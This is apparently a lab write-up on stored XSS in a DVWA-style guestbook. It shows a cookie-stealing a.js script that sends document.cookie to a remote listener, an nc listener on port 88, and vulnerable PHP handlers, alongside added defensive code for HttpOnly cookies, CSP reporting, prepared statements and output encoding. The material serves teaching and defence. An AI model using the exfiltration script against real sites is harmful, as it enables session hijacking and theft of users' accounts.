Stored XSS: the payload is kept persistently on the server side, so the JavaScript runs every time a user visits the page. Name field: the client-side form length limit is enforced only by the browser, so it is bypassed either in the client itself or with an intercepting proxy.
a.js source: var img = new Image(); img.src = "http://1.1.1.1:88/cookies.php?cookie="+document.cookie;
root@R:~# netstat -pantu | grep 80
tcp 0 0 127.0.0.1:80 0.0.0.0:* LISTEN 771/gsad
tcp 0 0 192.168.1.102:34212 140.98.195.27.80 ESTABLISHED 2840/wget
tcp6 0 127.0.0.1:8080 :::* LISTEN 2387/java
root@R:~# kill 771
root@R:~# service apache2 start
root@R:~# cd /var/www/html/
root@R:/var/www/html# gedit a.js
var img = new Image();
img.src = "http://192.168.1.102:88/cookies.php?cookie="+document.cookie;
root@R:~# nc -nlvp 88
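The payload above works because the session cookie is readable from document.cookie and because the page will load a script from any origin. As an added example (not part of the original notes), this is the PHP-side hardening a defender would apply to the guestbook application, together with a minimal collector so blocked attempts become log events; the application itself, its /csp-report path and an HTTPS deployment are assumptions.

```php
<?php
// Added example, not part of the original notes. Assumes the guestbook is served
// over HTTPS and that /csp-report is routed to the handler at the bottom of this file.

// 1. Session cookie flags. HttpOnly removes the cookie from document.cookie, so the
//    img.src = ".../cookies.php?cookie=" + document.cookie trick exfiltrates nothing
//    useful; Secure and SameSite limit where the browser will send it at all.
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'domain'   => '',        // current host only
    'secure'   => true,      // never sent over plain HTTP
    'httponly' => true,      // not exposed to JavaScript
    'samesite' => 'Strict',
]);
session_start();

// 2. Content Security Policy. script-src 'self' blocks both an injected inline
//    <script> and a remote <script src="http://192.168.1.102:88/a.js">; report-uri
//    makes the browser report every blocked attempt back to the application.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; "
     . "object-src 'none'; base-uri 'none'; form-action 'self'; report-uri /csp-report");

// 3. Detection: parse the JSON violation report a browser POSTs and keep the fields
//    an analyst needs. Returns null for anything that is not a well-formed report.
function handle_csp_report(string $body): ?array
{
    $report = json_decode($body, true);
    if (!is_array($report) || !isset($report['csp-report']) || !is_array($report['csp-report'])) {
        return null;
    }
    $r = $report['csp-report'];
    return [
        'document-uri' => (string)($r['document-uri'] ?? ''),
        'blocked-uri'  => (string)($r['blocked-uri'] ?? ''),
        'directive'    => (string)($r['violated-directive'] ?? ''),
    ];
}

$path = parse_url($_SERVER['REQUEST_URI'] ?? '', PHP_URL_PATH);
if ($path === '/csp-report' && ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    $event = handle_csp_report((string)file_get_contents('php://input'));
    if ($event !== null) {
        // A blocked-uri pointing at an unknown host is the signal to alert on.
        error_log('CSP violation: ' . json_encode($event));
    }
    http_response_code(204);
    exit;
}
```

With these headers in place the injected `<script src="http://192.168.1.102:88/a.js">` is refused by the browser, the nc listener on port 88 never receives a request, and the attempt shows up as a CSP violation line in the web server's error log instead.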
----------------------------------------------------------------------
Low security level code
<?php
if (isset($_POST['btnSign']))
{
    $message = trim($_POST['mixMessage']);
    $name    = trim($_POST['txtName']);

    // Sanitize message input (SQL escaping only; nothing here touches HTML)
    $message = stripslashes($message);
    $message = mysql_real_escape_string($message);

    // Sanitize name input (SQL escaping only)
    $name = mysql_real_escape_string($name);

    $query  = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
    $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>');
}
?>
---------------------------------------------------------------------------
Medium security level code
<?php
if (isset($_POST['btnSign']))
{
    $message = trim($_POST['mixMessage']);
    $name    = trim($_POST['txtName']);

    // Sanitize message input: tags stripped, SQL-escaped, then HTML-encoded
    $message = trim(strip_tags(addslashes($message)));
    $message = mysql_real_escape_string($message);
    $message = htmlspecialchars($message);

    // Sanitize name input: only a literal string replacement (listing cut off here in the source)
    $name = str_replace('
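Both listings escape for the wrong context: mysql_real_escape_string() and addslashes() protect the SQL statement, not the HTML the comment is later rendered into, and the medium level's str_replace() on the name is a literal-string blacklist rather than encoding. As an added example (not the original code), here is the same handler written the way a defender would: raw input is stored through a prepared statement and encoded for HTML only when displayed, and the length limit that the first line of these notes shows being bypassed on the client is enforced again on the server. The mysqli connection, the placeholder credentials and the two length limits are assumptions.

```php
<?php
// Added example, not the original notes' code. Table and field names follow the
// listings above; MAX_NAME, MAX_MESSAGE and the database credentials are assumptions.
declare(strict_types=1);

const MAX_NAME    = 50;
const MAX_MESSAGE = 500;

// Server-side validation. A client-side maxlength is only a usability hint and is
// removed with any intercepting proxy, so the same limits are enforced here.
function validate_entry(string $name, string $message): array
{
    $name    = trim($name);
    $message = trim($message);
    $errors  = [];
    if ($name === '' || mb_strlen($name, 'UTF-8') > MAX_NAME) {
        $errors[] = 'name must be 1-' . MAX_NAME . ' characters';
    }
    if ($message === '' || mb_strlen($message, 'UTF-8') > MAX_MESSAGE) {
        $errors[] = 'message must be 1-' . MAX_MESSAGE . ' characters';
    }
    return [$name, $message, $errors];
}

// Storage: a prepared statement keeps the data out of the SQL grammar entirely, which
// is what mysql_real_escape_string() was trying to do. It says nothing about HTML, so
// the value is stored exactly as typed.
function store_entry(mysqli $db, string $name, string $message): bool
{
    $stmt = $db->prepare('INSERT INTO guestbook (comment, name) VALUES (?, ?)');
    $stmt->bind_param('ss', $message, $name);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Output: encode for the HTML context at render time. ENT_QUOTES also encodes the
// single quote, so the same function is safe inside single-quoted attributes.
function html_encode(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_entry(string $name, string $message): string
{
    return '<div class="entry"><b>' . html_encode($name) . '</b>: '
         . nl2br(html_encode($message)) . '</div>';
}

if (isset($_POST['btnSign'])) {
    [$name, $message, $errors] = validate_entry(
        (string)($_POST['txtName'] ?? ''),
        (string)($_POST['mixMessage'] ?? '')
    );
    if ($errors !== []) {
        foreach ($errors as $e) {
            echo '<p class="error">' . html_encode($e) . '</p>';
        }
    } else {
        $db = new mysqli('localhost', 'DB_USER', 'DB_PASS', 'DB_NAME'); // placeholder credentials
        store_entry($db, $name, $message) or die('insert failed');
        echo render_entry($name, $message);
    }
}
```

A name of `<script src="http://192.168.1.102:88/a.js"></script>` is stored verbatim but rendered as `&lt;script src=...&gt;`, so it is displayed as text on every later visit instead of executed; no blacklist of tag spellings is needed because the encoding is applied to every character that has meaning in HTML.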
root@R:~# vi 1
root@R:~# nc -nlvp 88
BeEF browser attack surface: applications have largely moved to the B/S (browser/server) architecture, which makes the browser the universal client program.